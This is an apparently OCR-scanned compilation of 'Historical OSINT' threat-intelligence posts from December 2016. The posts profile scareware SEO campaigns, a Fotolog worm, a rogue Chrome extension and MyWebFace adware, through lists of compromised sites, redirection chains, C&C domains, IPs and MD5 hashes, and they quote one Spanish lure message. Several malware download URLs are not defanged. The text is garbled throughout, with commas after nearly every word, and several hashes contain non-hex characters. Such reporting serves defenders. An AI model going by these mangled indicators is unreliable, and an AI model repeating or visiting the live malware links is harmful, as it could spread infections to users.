hxxp://downloads.crymyway.com 
hxxp://downloads.fileserversa.net 
hxxp://downloads.fileserversb.net 
hxxp://downloads.fileserversc.net 
hxxp://downloads.fileserversd.net 
hxxp://downloads.fileserverse.net 
hxxp://downloads.portodrive.net 
hxxp://downloads.fileserversf.net 
hxxp://downloads.fileserversg.net 
hxxp://downloads.fileserversh.net 
hxxp://downloads.fileserversi.net 
hxxp://downloads.fileserversj.net 
hxxp://downloads.fileserversk.net 
hxxp://downloads.fileserversl.net 
hxxp://downloads.fileserversm.net 
hxxp://downloads.fileserversn.net 
hxxp://downloads.fileserverso.net 
hxxp://downloads.fileserversp.net 
hxxp://downloads.fileserversq.net 
hxxp://downloads.fileserversr.net 
hxxp://downloads.regzavids.net 
hxxp://downloads.vedivids.net 
hxxp://downloads.tastyfiles.net 


hxxp://downloads.restpictures.net 
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hxxp://downloads.modavedis.net 
hxxp://downloads.fileserverss.net 
hxxp://downloads.fileserverst.net 
hxxp://downloads.fileserversu.net 
hxxp://downloads.regzapix.net 
hxxp://downloads.reggiepix.net 
hxxp://downloads.migpix.net 
hxxp://downloads.legomay.net 
hxxp://downloads.vediway.net 
hxxp://downloads.compoway.net 
hxxp://downloads.restway.net 


hxxp://downloads.crymyway.net 


We'll, continue, monitoring, the, campaign, and, post, updates, as, soon, as, new, devel- 
opments, take, place. 


12.6.5 Historical OSINT - Haiti-themed Blackhat SEO Campaign Serving Scareware 
Spotted in the Wild (2016-12-23 12:53) 


In, a, cybercrime, ecosystem, dominated, by, fraudulent, propositions, cybercriminals, con- 
tinue, actively, spreading, malicious, software, largely, relying, on, a, pre-defined, set, of, 
compromised, hosts, for, the, purpose, of, spreading, malicious, software, further, expanding, 
a, specific, botnet’s, infected, population, further, earning, fraudulent, revenue, in, the, 
process, of, monetizing, the, access, to, the, infected, hosts, largely, relying, on, an, affiliate- 
based, type, of, monetizing, scheme. 


In, this, post, we'll, profile, a, currently, circulating, malicious, black, hat, SEO (search 
engine optimization), campaign, provide, actionable, intelligence, on, the, infrastructure, 
behind, it, and, discuss, in-depth, the, tactics, techniques, and, procedures, of, the, cybercrim- 
inals, behind, it. 
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Sample, portfolio, of, affected, Web, sites: 
hxxp://austinluce.co.uk 
hxxp://naukatanca.co.uk 
hxxp://truenorthinnovation.co.uk 
hxxp://robsonsofwolsingham.co.uk 


hxxp://daviddewphotography.co.uk 


Sample, URL, redirection, chain: 
hxxp://sciencefirst.com/?red=haiti-earthquake-donate 
- hxxp://otsosute.freehostia.com/c.html 


- hxxp://scan-now24.com/go.php?id=2022 &key=4c69e59ac &d=1 


Sample, URL, redirection, chain: 

hxxp://lipsticpi.ru/sm/r.php 

- hxxp://uscaau.com/back.php 

- hxxp://sekuritylistsite.com/hitin.php?land=20 &affid=94801 

- hxxp://mypremiumantyspywarepill.com/hitin.php?land=20 &affid=94801 


- hxxp://mypremiumantyspywarepill.com/index.php?affid=94801 


Sample, detection, rate, for, a, sample, malicious, executable: 


MD5: ebc956abadefdac794ebcd1898ea07cf 


Sample, detection, rate, for, a, sample, malicious, executable: 


MD5: d65a5dlab98bd690dccd07cb6eebcba3 
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Once, executed, a, sample, malware, phones, back, to, the, following, C &C, server, 
IPs: 


hxxp://mypremiumantyspywarepill.com/in.php?affid=94801 


hxxp://greatnorthwill.com/?mod=vv &i=1 &id=11-18 


Related, malicious, domains, known, to, have, participated, in, the, campaign: 
hxxp://getholidaypresent0.com - 204.12.225.83 
hxxp://getholidaypresent2.com 

hxxp://getholidaypresent3.com 

hxxp://scan-now22.com 

hxxp://scan-now23.com 

hxxp://scan-now24.com 

hxxp://santaclaus4.com 

hxxp://getholidaypresent5.com 


hxxp://getholidaypresent7.com 


Related, malicious, domains, known, to, have, participated, in, the, campaign: 
hxxp://freeantyviruspillblog.com - 213.163.91.240 
hxxp://newgoodantyspywarepill.com 

hxxp://mypremiumantyspywarepill.com 

hxxp://freegoodantyviruspill.com 

hxxp://freeantyspywarepillshop.com 


hxxp://thevirustoolbox.com 


We'll, continue, monitoring, the, campaign, and, post, updates, as, soon, as, new, devel- 
opments, take, place. 
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12.6.6 Historical OSINT - Massive Black Hat SEO Campaing Serving Scareware Spot- 
ted in the Wild (2016-12-24 05:47) 


In, a, cybercrime, ecosystem, dominated, by, fraudulent, propositions, cybercriminals, con- 
tinue, actively, acquiring, and, hijacking, traffic, for, the, purpose, of, converting, it, to, 
malware-infected, hosts, while, earning, fraudulent, revenue, in, the, process, of, monetizing, 
the, hijacked, and, acquired, traffic, largely, relying, on, a, set, of, tactics, techniques, and, 
procedures, successfully, earning, fraudulent, revenue, in, the, process, of, monetizing, the, 
hijacked, and, acquired, traffic, largely, relying, on, an, affiliate-based, type, of, monetizing, 
scheme. 


We've, recently, intercepted, a, currently, circulating, malicious, black, hat, SEO (search 
engine optimization), campaign, serving, fake, security, software, also, Known, as, scareware, 
successfully, monetizing, the, hijacked, and, acquired, traffic, largely, relying, on, the, utiliza- 
tion, of, affiliate-network, based, type, of, monetizing, scheme. 


In, this, post, we'll, profile, the, campaign, provide, actionable, intelligence, on, the, in- 
frastructure, behind, it, and, discuss, in-depth, the, tactics, techniques, and, procedures, of, 
the, cybercriminals, behind, it. 


Sample, portfolio, of, compromised, Web, sites: 
hxxp://yushikai.co.uk 
hxxp://www.heart-2-heart.nl 
hxxp://www.stichtingkhw.nl 
hxxp://burgessandsons.com 
hxxp://marsmellow.info 
hxxp://broolz.co.uk 
hxxp://bodyscope.co.uk 
hxxp://janschnoor.de 
hxxp://goodluckflowers.com 
hxxp://www.frank-carillo.com 


hxxp://www.strijkvrij.com 
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hxxp://www.fotosiast.nl 
hxxp://www.senbeauty.nl 
hxxp://www.menno.info 


hxxp://www.kul.fm 


Sample, URL, redirection, chain: 
hxxp://onotole.iblogger.org/2.html - 199.59.243.120; 205.164.14.79; 199.59.241.181 -> 


hxxp://mycommercialssecuritytool.com/index.php?affid=34100 - 89.248.171.48 - Email: 
Kathryn.D.Jennings@gmail.com 


Related, malicious, domains, known, to, have, participated, in, the, campaign: 
hxxp://myatmoe.iblogger.org 
hxxp://creditreport.iblogger.org 
hxxp://movieddiheaven.iblogger.org 
hxxp://cv-bruno-brocas.iblogger.org 
hxxp://islife.iblogger.org 
hxxp://iblogger.iblogger.org 
hxxp://dressshirt.iblogger.org 
hxxp://allians.iblogger.org 
hxxp://rapid-weight-loss.iblogger.org 
hxxp://breastaugm.iblogger.org 
hxxp://uila.iblogger.org 
hxxp://oh-tv.iblogger.org 
hxxp://brudnopis.iblogger.org 
hxxp://learnenglish.iblogger.org 


hxxp://motivatedcats.iblogger.org 
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hxxp://robert.iblogger.org 
hxxp://testforask.iblogger.org 
hxxp://poormanguides.iblogger.org 
hxxp://gelbegabeln.iblogger.org 
hxxp://nuagerouge.iblogger.org 
hxxp://chicos-on-line.iblogger.org 
hxxp://hypnosisworld.iblogger.org 
hxxp://tennis.iblogger.org 
hxxp://ibu.iblogger.org 
hxxp://turkifsa.iblogger.org 
hxxp://amandacooper.iblogger.org 
hxxp://tw.iblogger.org 
hxxp://whedon.iblogger.org 
hxxp://han.iblogger.org 
hxxp://scclab.iblogger.org 
hxxp://besftfoodblogger.iblogger.org 
hxxp://premiummenderacunt.iblogger.org 
hxxp://seobook.iblogger.org 
hxxp://bestjackets.iblogger.org 
hxxp://kidszone.iblogger.org 
hxxp://liker2fb.iblogger.org 
hxxp://vipin.iblogger.org 
hxxp://infobaru.iblogger.org 
hxxp://palermo.iblogger.org 


hxxp://forum.bay.de.iblogger.org 
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hxxp://online-guard.iblogger.org 
hxxp://juhjsd.iblogger.org 


hxxp://asulli.iblogger.org 


hxxp://youtubetranscription.iblogger.org 


hxxp://praza.iblogger.org 
hxxp://free-worlds.iblogger.org 
hxxp://mIm.iblogger.org 
hxxp://myleskadusale.iblogger.org 
hxxp://ninjapearls.iblogger.org 
hxxp://bassian.iblogger.org 
hxxp://d3-f21-w-14.iblogger.org 
hxxp://mlk.iblogger.org 
hxxp://pe.iblogger.org 
hxxp://connor54321.iblogger.org 
hxxp://smx.iblogger.org 
hxxp://17fire.iblogger.org 
hxxp://greatestbattles.iblogger.org 
hxxp://generalsurgery.iblogger.org 
hxxp://megafon.iblogger.org 
hxxp://dasefx.iblogger.org 
hxxp://ysofii.iblogger.org 
hxxp://priv8.iblogger.org 
hxxp://kahramanmaras.iblogger.org 
hxxp://kaoojcjl.iblogger.org 


hxxp://infobaru.iblogger.org 
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hxxp://dla-kobiet.iblogger.org 
hxxp://karinahart.iblogger.org 
hxxp://mariucciaelasuaombra.iblogger.org 
hxxp://signinbay.de.iblogger.org 
hxxp://pitstop.iblogger.org 
hxxp://colorless.iblogger.org 
hxxp://directorio.iblogger.org 
hxxp://odenaviva.iblogger.org 
hxxp://e-money.iblogger.org 
hxxp://digicron.iblogger.org 
hxxp://slotomania-hackers.iblogger.org 
hxxp://blazetech.iblogger.org 
hxxp://blazetech.iblogger.org 
hxxp://bestoksriy.iblogger.org 
hxxp://teamsite.iblogger.org 
hxxp://mateaplicada.iblogger.org 
hxxp://tmgames.iblogger.org 
hxxp://nativephp.iblogger.org 
hxxp://priv8.iblogger.org 
hxxp://sharepointdotnetwiki.iblogger.org 
hxxp://nativephp.iblogger.org 
hxxp://seobook.iblogger.org 
hxxp://jawwal.iblogger.org 
hxxp://tomsplace.iblogger.org 


hxxp://shreyo.iblogger.org 
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hxxp://greatestbattles.iblogger.org 
hxxp://beitypedia.iblogger.org 
hxxp://dutcheastindies.iblogger.org 
hxxp://cramat-satu.iblogger.org 
hxxp://misc.iblogger.org 
hxxp://espirito-de-aventura.iblogger.org 
hxxp://tomksoft.iblogger.org 


hxxp://mymovies.iblogger.org 


Known, to, have, responded, to, the, same, malicious, IP (199.59.243.120) are, also, 
the, following, malicious, domains: 


hxxp://obrendsrnzwrn.cuccfree.com 
hxxp://caraccidentlawyer19.us 
hxxp://colombiavirtualtours.com 
hxxp://dailydigest.cn 
hxxp://drugaddiction569.us 
hxxp://earnonline.cn 
hxxp://epicor.in 

hxxp://glhgk.com 
hxxp://iroopay.com 


hxxp://kajianislam.us 


Related, malicious, MD5s, known, to, have, phoned, back, to, the, same, malicious, C 
&C, server, IPs (199.59.243.120): 


MD5: c7bd669a416a8347aeba6117d0040217 


MD5: ae89e09f52db7f9d69b9b9c40dbf35f9 
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MD5: b4399fc8flde723d452b05ec474ca651 
MD5: c779d9f4e9992ad5ffcd2353bb003a51 


MD5: cc6efabb0a26c729f126b12be717de47 


Once, executed, a, sample, malware, phones, back, to, the, following, C &C, server, 
IPs: 


hxxp://theworldnews.byethost5.com - 199.59.243.120 


Known, to, have, responded, to, the, same, malicious IP (205.164.14.79), are, also, the, 
following, malicious, domains: 


hxxp://fsdq.cn 
hxxp://parked-domain.org 
hxxp://fiverr.hk.tn 
hxxp://hamzanori90.name-igq.com 
hxxp://postgumtree.uk.tn 
hxxp://caoliushequ.info 
hxxp://housewives.byethost4.com 
hxxp://nuichate.22web.org 


hxxp://3rtz.byethost12.com 


Related, malicious, MD5s, known, to, have, phoned, back, to, the, same, malicious, C 
&C, server, IPs (205.164.14.79): 


MD5: dbca66955cac79008f9f1cd415d7e308 
MD5: b452ca519f077307d68ff034567087c1 
MD5: 70e8c79135b341eac51da0b5789744d3 
MD5: a9f64c1404faf4a6fc81564c8dec22d9 


MD5: b3737a1c34cb705f7d244c99afdc3a01 
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Once, executed, a, sample, malware (MD5:dbca66955cac79008f9f1cd415d7e308), phones, 
back, to, the, following, C &C, server, IPs: 


hxxp://ibayme.eb2a.com - 205.164.14.79 


Known, to, have, responded, to, the, same, malicious, IPs (199.59.241.181), are, also, 
the, following, malicious, domains: 


hxxp://yn919.com 

hxxp://wimp. it 

hxxp://puqiji.com 
hxxp://52style.com 
hxxp://007guard.com 
hxxp://10iski.10001mb.com 
hxxp://11649.bodisparking.com 
hxxp://13.get.themediafinder.com 


hxxp://134205.aceboard.fr 


Sample, detection, rate, for, a, malicious, executable: 


MD5: f74a744d75c74ed997911d0e0b7e6f67 


Once, executed, a, sample, malware, phones, back, to, the, following, C &C, server, 
IPs: 


hxxp://mycommercialssecuritytool.com/in.php?affid=34100 


Related, malicious, domains, known, to, have, participated, in, the, campaign: 


hxxp://protectyoursystemnowonline.com 


5449 


hxxp://createyoursecurityonline.com 
hxxp://commercialssecuritytools.com 


hxxp://freecreateyoursecurity.com 


Sample, URL, redirection, chain: 

hxxp://ulions.com/yxg.php?p= - 104.28.22.34 

- hxxp://ppbmv4.xorg.pl/in.php?t=cc &d=04-02-2010 span &h= 

- hxxp://wwwl1.nat67go4it.net/?uid=195 &pid=3 &ttl=5184c614d4b - 89.248.160.161 


- hxxp://wwwl1.systemsecure.in/?p= 


Know, to, have, responded, to, same, malicious, C &C, server, IP (104.28.22.34), are, 
also, the, following, malicious, domains: 


hxxp://portlandultimate.com 
hxxp://portablemineapplicationsub.tech 
hxxp://indirimkuponlarimiz.com 
hxxp://walkinclosetguys.com 
hxxp://bryantanaka.com 
hxxp://swisschecklist.com 
hxxp://census.mnfurs.org 


hxxp://duluthbeth.xyz 


Related, malicious, MD5s, known, to, have, phoned, back, to, the, same, malicious, C 
&C, server, IPs (104.28.22.34): 


MD5: 1lddaObbd2aef7944f990fcefbc91034 
MD5: d0be24df3078866a277874dad09c98d9 


MD5: 9ba06da9370037fd2ffe525d6164b367 
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MD5: 537bd45df702f90585eebab2a8bb3584 


MD5: a9f61e9696ff7ff4bfc34f70549ffddO 


Once, executed, a, sample, malware (MD5:11dda0bbd2aef7944f990fcefbc91034), phones, 
back, to, the, following, C &C, server, IPs: 


hxxp://audio-direkt.net 
hxxp://servico-ind.com 
hxxp://saios.net 
hxxp://coopsupermarkt.nl 
hxxp://fruitspot.co.za 
hxxp://vitalur.by 


hxxp://trinity-works.com 


Once, executed, a, sample, malware (MD5:d0be24df3078866a277874dad09c98d9), phones, 
back, to, the, following, C &C, server, IPs: 


hxxp://3asfh.net - 104.28.22.34 


Once, executed, a, sample, malware, (MD5:a9f61e9696ff7ff4bfc34f70549ffdd0), phones, 
back, to the, following, malicious, C &C, server, IPs: 


hxxp://link-list-uk.com 
hxxp://racknstackwarehouse.com.au 
hxxp://zeronet.co.jp 
hxxp://sun-ele.co.jp 
hxxp://slcago.org 


hxxp://frederickallergy.com 


We'll, continue, monitoring, the, campaign, and, post, updates, as, soon, as, new, devel- 
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opments, take, place. 


12.6.7 Historical OSINT - FTLog Worm Spreading Across Fotolog (2016-12-24 12:49) 


In, a, cybercrime, ecosystem, dominated, by, fraudulent, propositions, cybercriminals, con- 
tinue, actively, populating, their, botnet’s, infected, population, further, spreading, malicious, 
software, while, compromising, the, confidentiality, integrity, and, availability, of, the, af- 
fected, hosts, to, a, multu-tude, of, malicious, software, while, earning, fraudulent, revenue, 
in, the, process, of, monetizing, access, to, the, malware-infected, hosts, further, spreading, 
malicious, software, while, monetizing, access, to, malware-infected, hosts, largely, relying, 
on, a, set, of, tactics, techniques, and, procedures, successfully, monetizing, access, to, 
the, malware-infected, hosts, largely, relying, on, the, utilization, of, affiliate-based, type, of, 
monetizing, scheme. 


We've, recently, intercepted, a currently, circulating, malicious, spam, campaign, tar- 
geting, the, popular, social, network, Web, site, Fotolog, successfully, enticing, socially, 
engineered, users, into, interacting, with, malicious, links, while, monetizing, access, to, the, 
malware-infected, hosts, largely, relying, on, the, utilization, of, an, affiliate-based, type, of, 
monetizing, scheme. 


In, this, post, we'll, profile, the, campaign, provide, actionable, intelligence, on, the, in- 
frastructure, behind, it, and, discuss, in-depth, the, tactics, techniques, and, procedures, of, 
the, cybercriminals, behind, it. 


Amaia918371 On 22/02/2010 


hey yoourmama, encontré este video tuyo aca 


http J/bitly/c BTsWo 


eres tu no es verdad? 


Sample, URL, redirection, chain: 
hxxp://bit.ly/cBTsWo 
- hxxp://zwap.to/001mk 


- hxxp://www.cepsaltda.cl/uc/red.php?u=1 - 216.155.72.44 
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- hxxp://supatds.cn/go.php?sid=1 - 92.241.164.1 
- hxxp://www.cepsaltda.cl/uc/rcodec.php 


- hxxp://cepsaltda.cl/uc/codec/divxcodec.exe 


Sample, detection, rate, for, a, sample, malicious, executable: 


MD5: c6dbc58e0db3c597c4ab562ad9710a38 


We'll, continue, monitoring, the, campaign, and, post, updates, as, soon, as, new, devel- 
opments, take, place. 


12.6.8 Historical OSINT - Google Docs Hosted Rogue Chrome Extension Serving Cam- 
paign Spotted in the Wild (2016-12-24 19:12) 


In, a, cybercrime, ecosystem, dominated, by, malicious, software, releases, cybercriminals, 
continue, actively, populating, their, botnet’s, infected, population, further, spreading, mali- 
cious, software, while, earning, fraudulent, revenue, in, the, process, of, obtaining, access, 
to, malware-infected, hosts, further, compromising, the, confidentiality, integrity, and, avail- 
ability, of, the, affected, hosts, successfully, earning, fraudulent, revenue, in, the, process, 
of, monetizing, access, to, malware-infected, hosts, largely, relying, on, the, utilization, of, 
affiliate-based, type, of, monetization, scheme. 


We've, recently, intercepted, a, currently, circulating, malicious, spam, campaign, affect- 
ing, Google Docs, while, successfully, enticing, socially, engineered, users, into, clicking, on, 
bogus, links, potentially, exposing, the, confidentiality, integrity, and, availability, of, the, 
affected, hosts, successfully, exposing, socially, engineered, users, to, a, rogue, Chrome 
Extension. 


In, this, post, we'll, profile, the, campaign, provide, actionable, intelligence, on, the, in- 
frastructure, behind, it, discuss, in-depth, the, tactics, techniques, and, procedures, of, the, 
cybercriminals, behind, it, and, provide, actionable, intelligence, on, the, infrastructure, 
behind, it. 
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Sample, URL, redirection, chain: 
https://1364757661090.docs.google.com/presentation/d/lw5eh2rh6i0pbuVjb4 
MzZBNPEovRw3fé6qiho7AshTcHI/htmlpresent?videoid=1364757661199 -> 


http://www.worldvideos.us/chrome.php -> https://chrome.google.com/webstore/detail/high- 
solution/jokhejlfefegeolonbckg gpfggipmmim 


Related, malicious, domain, reconnaissance: 
hxxp://worldvideos.us - 89.19.10.194 
ns1.facebookhizmetlerim.com 


ns2.facebookhizmetlerim.com 


Responding to 89.19.10.194 are also the following fraudulent domains part of the cam- 
paign’s infrastructure: 


hxxp://e-sosyal.biz 
hxxp://facebookhizmetlerim.com 
hxxp://facebookmedya.biz 
hxxp://facebooook.biz 
hxxp://fomedyahizmetleri.com 
hxxp://sansurmedya.com 
hxxp://sosyalpaket.com 
hxxp://worldmedya.net 


hxxp://youtubem. biz 


Related, malicious, domains, known, to, have, responded, to, the, same, malicious, C 
&C, server, IPs (208.73.211.70): 


hxxp://396p4rassd2.youlovesosopIine.net 
hxxp://5q14.zapd.co 


hxxp://airmats.com 
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hxxp://amciksikis.com 
hxxp://anaranjadaverzochte.associate-physicians.org 
hxxp://autorepairmanual.org 
hxxp://blackoutblinds.com 


hxxp://blog.jmarkafghans.com 


Related, malicious, MD5s, known, to, have, phoned, back, to, the, same, C &C, server, 
IPs (208.73.211.70): 


MD5: 584a779ae8cdeal3611ff45ebab517ae 
MD5: cea89679058fe5a5288cfaccla64e431 
MD5: 62eee7a0bed6e958e72c0edf9dal7196 
MD5: 160793c37a5aa29ac4c88ba88d1d7cc2 


MD5: 46079bbcfcd792dfcd1e906e1a97c3a6 


Once, executed, a, sample, malware (MD5: 584a779ae8cdeal13611ff45ebab517ae), phones, 
back, to, the, following, C &C, server, IPs: 


hxxp://zhutizhijia.com - 208.73.211.70 


Once, executed, a, sample, malware (MD5: cea89679058fe5a5288cfaccla64e431), phones, 
back, to, the, following, C &C, server, IPs: 


hxxp://aieov.com - 208.73.211.70 


Related, malicious, domains, known, to, have, responded, to, the, same, malicious, C 
&C, server, IPs (141.8.224.239): 


hxxp://happysocks. 7live7.org 
hxxp://hiepdam.org 


hxxp://hyper-path.com 
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hxxp://interfacelife.com 
hxxp://iowa.findanycycle.com 
hxxp://massachusetts.findanyboat.com 


hxxp://diptnyc.com 


Related, maliciuos, MD5s, known, to, have, phoned, back, to, the, same, C &C, server, 
IPs (141.8.224.239): 


MD5: ddf27e034e38d7d35b71b7dc5668ffce 
MD5: 6ba6451a9c185d1d07323586736e770e 
MD5: 854ea0da9b4ad72aba6430ffa6cc1532 
MD5: d5585af92c512bec3009b1568c8d2f7d 


MD5: bf78bOfcfc8f1la380225ceca294c47d8 


Once, executed, a, sample, malware (MD5:ddf27e034e38d7d35b71b7dc5668ffce), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://srv.desk-top-app.info - 141.8.224.239 


Once, executed, a, sample, malware (MD5:6ba6451a9c185d1d07323586736e770e), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://premiumstorage.info - 141.8.224.239 


Once, executed, a, sample, malware (MD5: d5585af92c512bec3009b1568c8d2f7d), phones, 
back, to, the, following, C &C, server, IPs: 


hxxp://riddenstorm.net - 208.100.26.234 
hxxp://lordofthepings.ru - 173.254.236.159 
hxxp://yardnews.net - 104.154.95.49 


hxxp://wentstate.net - 141.8.224.93 
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hxxp://musicnews.net - 176.74.176.187 


hxxp://spendstate.net 


Related, malicious, domains, known, to, have, responded, to, the, same, malicious, C 
&C, server, IPs (89.19.10.194): 


hxxp://liderbayim.com 
hxxp://blacksport.org 
hxxp://liderbayim.com 
hxxp://2sosyal-panelim.com 
hxxp://sosyal-panelim.com 
hxxp://darknessbayim.com 


hxxp://nebobayi.com 


We'll, continue, monitoring, the, campaign, and, post, updates, as, soon, as, new, devel- 
opments, take, place. 


12.6.9 Historical OSINT - Rogue MyWebFace Application Serving Adware Spotted in 
the Wild (2016-12-25 07:20) 


In, a, cybercrime, ecosystem, dominated, by, malicious, software, releases, cybercriminals, 
continue, actively, populating, their, botnet’s, infected, population, further, spreading, ma- 
licious, software, potentially, exposing, the, confidentiality, integrity, and, availability, of, 
the, affected, hosts, further, spreading, malicious, software, while, monetizing, access, to, 
malware-infected, hosts, largely, relying, on, the, utilization, of, affiliate-based, type, of, 
monetizing, scheme. 


We've, recently, intercepted, a, currently, circulating, malicious, spam, campaign, entic- 
ing, users, into, executing, a, malicious, software, largely, relying, on, basic, visual, social, 
engineering, enticing, users, into, executing, a, rogue, application, potentially, exposing, the, 
confidentiality, integrity, and, availability, of, the, affected, host. 
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mywebsearch Google 


Quick links to your favorite sites: 


MBHO2OwfivO"O® 


In, this, post, we'll, profile, the, campaign, provide, actionable, intelligence, on, the, in- 
frastructure, behind, it, and, discuss, in-depth, the, tactics, techniques, and, procedures, of, 
the, cybercriminals, behind, it. 


Related, malicious, domain, reconnaissance: 
hxxp://mywebsearch.com - 74.113.233.48; 74.113.237.48; 66.235.119.48 


hxxp://mywebface.mywebsearch.com - 74.113.233.64; 74.113.233.180 


Sample, detection, rate, for, a, malicious, executable: 


MD5: b32acfece8089e52fa2288cb421fa9de 
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Related, malicious, domains, known, to, have, responded, to, the, 
same, malicious, C &C, server, IPs (74.113.233.48; 74.113.237.48; 
66.235.119.48): 

hxxp://myinfo.mywebsearch.com 
hxxp://dl.mywebsearch.com 
hxxp://tbedits.mywebsearch.com 
hxxp://celebsauce.dl.mywebsearch.com 
hxxp://bfc.mywebsearch.com 
hxxp://bar.mywebsearch.com 
hxxp://int.search.mywebsearch.com 
hxxp://inboxace.dl.mywebsearch.com 
hxxp://internetspeedtracker.dl.mywebsearch.com 
hxxp://mywebface.dl.mywebsearch.com 
hxxp://easypdfcombine.d|l.mywebsearch.com 
hxxp://onlinemapfinder.d|.mywebsearch.com 
hxxp://eliteunzip.dl.mywebsearch.com 
hxxp://mytransitguide.dl.mywebsearch.com 
hxxp://packagetracer.dl.mywebsearch.com 
hxxp://myway.mywebsearch.com 
hxxp://helpint.mywebsearch.com 
hxxp://zwinky.dl.mywebsearch.com 
hxxp://weatherblink.dl.mywebsearch.com 
hxxp://videoscavenger.dl.mywebsearch.com 
hxxp://videodownloadconverter.dl.mywebsearch.com 


hxxp://translationbuddy.dl.mywebsearch.com 
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hxxp://totalrecipesearch.dl.mywebsearch.com 
hxxp://televisionfanatic.dl.mywebsearch.com 
hxxp://retrogamer.dl.mywebsearch.com 
hxxp://myscrapnook.dl.mywebsearch.com 
hxxp://myfuncards.dl.mywebsearch.com 
hxxp://gamingwonderland.dl.mywebsearch.com 
hxxp://dictionaryboss.dl.mywebsearch.com 
hxxp://astrology.dl.mywebsearch.com 
hxxp://utmtrk2.mywebsearch.com 
hxxp://utm2.mywebsearch.com 
hxxp://utm.trk.mywebsearch.com 
hxxp://utm.mywebsearch.com 
hxxp://ak.ssl.toolbar.mywebsearch.com 
hxxp://www122.mywebsearch.com 
hxxp://couponalert.dl.mywebsearch.com 
hxxp://help.mywebsearch.com 
hxxp://srchsugg.mywebsearch.com 
hxxp://utm.gr.mywebsearch.com 
hxxp://utmtrk.gr.mywebsearch.com 
hxxp://dp.mywebsearch.com 
hxxp://download.mywebsearch.com 
hxxp://www64.mywebsearch.com 
hxxp://filmfanatic.mywebsearch.com 
hxxp://mywebface.mywebsearch.com 


hxxp://fromdoctopdf.dl.mywebsearch.com 
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hxxp://www173.mywebsearch.com 
hxxp://www153.mywebsearch.com 
hxxp://www170.mywebsearch.com 
hxxp://www176.mywebsearch.com 
hxxp://www155.mywebsearch.com 
hxxp://www186.mywebsearch.com 
hxxp://www156a.mywebsearch.com 
hxxp://www187.mywebsearch.com 
hxxp://www198.mywebsearch.com 
hxxp://www154.mywebsearch.com 


hxxp://cfg.mywebsearch.com 


hxxp://mapsgalaxy.dl.mywebsearch.com 


hxxp://edits. mywebsearch.com 
hxxp://www.mywebsearch.com 
hxxp://enable.mywebsearch.com 
hxxp://live.mywebsearch.com 
hxxp://config.mywebsearch.com 
hxxp://anx.mywebsearch.com 
hxxp://pstat.mywebsearch.com 
hxxp://updates.mywebsearch.com 
hxxp://home.mywebsearch.com 
hxxp://search.mywebsearch.com 
hxxp://stats. mywebsearch.com 
hxxp://akd.search.mywebsearch.com 


hxxp://ak2.home.mywebsearch.com 
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hxxp://ak.search.mywebsearch.com 


hxxp://ak.toolbar.mywebsearch.com 


myWeblacK2) /myway” 
M lebFace provides these features and web search on ur Chrome New Tab 
yA Pp yo D it’s FREE! 


CREATE A CARTOON TOU 


© 2016 Mindspark interactive Network, inc. Terms of Service | Privacy Policy | Uninstall 
All tacemarks are property of their respective owners. No affiliabon oF endorsement is intended oF impbed 


Related, malicious, MD5s, known, to, have, participated, in, the, campaign: 
MD5: 83cdb402fcd68947f7519eaad515fa5a 

MD5: 6b631cc25e68d5d008e319c4alc8c4098 

MD5: f2392d18a266f554743b495b4e71b2be 

MD5: 9bcaeb5b4bdd6b9e22852a98ca630914 


MD5: 4fd260e17ca40a31la7baace9aflb7db9 
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Once, executed, a, sample, malware, (MD5: 83cdb402fcd68947f7519eaad515fa5a), phones, 
back, to, the, following, C &C, server, IPs: 


hxxp://178.150.139.157/search.htm 


hxxp://sev2012.com/page _ _click.php - 141.8.224.239; 54.72.9.51; 91.220.131.33; 
91.236.116.20 


hxxp://62.122.107.119/install.Atm 


Known, to, have, responded, to, the, same, malicious, C &C, server, IPs (178.150.139.157), 
are, also, the, following, malicious, domains: 


hxxp://cejzesu.com 


hxxp://hgyibul.wuwykym.net 


Related, malicious, MD5s, known, to, have, responded, to, the, same, malicious, C &C, 
server, IPs: 


MD5: c92a9961e6096eb7af3a34e9e48114f1 
MD5: 25789eec9e0d4b5cdf184bf41460808e 
MD5: 1a72e482e6ec352ae4c9206b92776f01 
MD5: e22a0fd64e5b6193be655cc29ed19755 


MD5: fe8a027fd45ec9621b34a20bc907fb2c 


Once, executed, a, sample, malware (MD5: c92a9961e6096eb7af3a34e9e48114f1), phones, 
back, to, the, following, C &C, server, IPs: 


http://178.150.244.54/mod2/mentalc.exe 


http://178.150.139.157/mod1/mentalc.exe 


Once, executed, a, sample, malware (MD5: 25789eec9e0d4b5cdf184bf41460808e), phones, 
back, to, the, following, C &C, server, IPs: 


http://95.180.66.40/mod2/bO0ber01.exe 
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http://91.245.79.46/mod1/b0ber01.exe 


http://178.150.139.157/mod1/b0ber01.exe 


Once, executed, a, sample, malware (MD5: 1a72e482e6ec352ae4c9206b92776f01), phones, 
back, to, the, following, C &C, server, IPs: 


http://77.123.73.34/keybex4.exe 


http://178.150.139.157/keybex4.exe 


Once, executed, a, sample, malware (MD5: e22a0fd64e5b6193be655cc29ed19755), phones, 
back, to, the, following, C &C, server, IPs: 


http://176.194.18.198/mod2/ozersid.exe 
http://176.110.28.238/mod1/ozersid.exe 
http://46.73.67.61/mod2/ozersid.exe 
http://178.150.209.116/mod2/ozersid.exe 
http://178.150.139.157/mod2/ozersid.exe 
http://193.32.14.186/mod1/ozersid.exe 


http://46.211.9.37/mod1/ozersid.exe 


Once, executed, a, sample, malware (MD5: fe8a027fd45ec9621b34a20bc907fb2c), phones, 
back, to, the, following, C &C, server, IPs: 


http://178.150.139.157/welcome.htm 
http://77.122.28.206/default.htm 
http://77.122.28.206/online.ptm 


http://mydear.name/page _umax.php 


Once, executed, a, sample, malware, (MD5: 6b31cc25e68d5d008e319c4a1c8c4098), phones, 
back, to, the, following, C &C, server, IPs: 
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hxxp://cytpaxiz.us/rasta01.exe 
hxxp://60.36.47.71/file.htm 


hxxp://219.204.4.3/search.htm 


Once, executed, a, sample, malware, (MD5: £2392d18a266f554743b495b4e71b2be), phones, 
back, to, the, following, C &C, server, IPs: 


hxxp://46.121.221.173/start.htm 
hxxp://burhyyal.epfusgy.com/calc.exe 


hxxp://178.150.138.2/install.htm 


Once, executed, a, sample, malware, (MD5: 9bcaeb5b4bdd6b9e22852a98ca630914), 
phones, back, to, the, following, C &C, server, IPs: 


hxxp://159.224.191.47/install.Atm 


hxxp://109.87.184.7/setup.htm 


Once, executed, a, sample, malware, (MD5: 4fd260e17ca40a31a7baace9af1lb7db9), phones, 
back, to, the, following, C &C, server, IPs: 


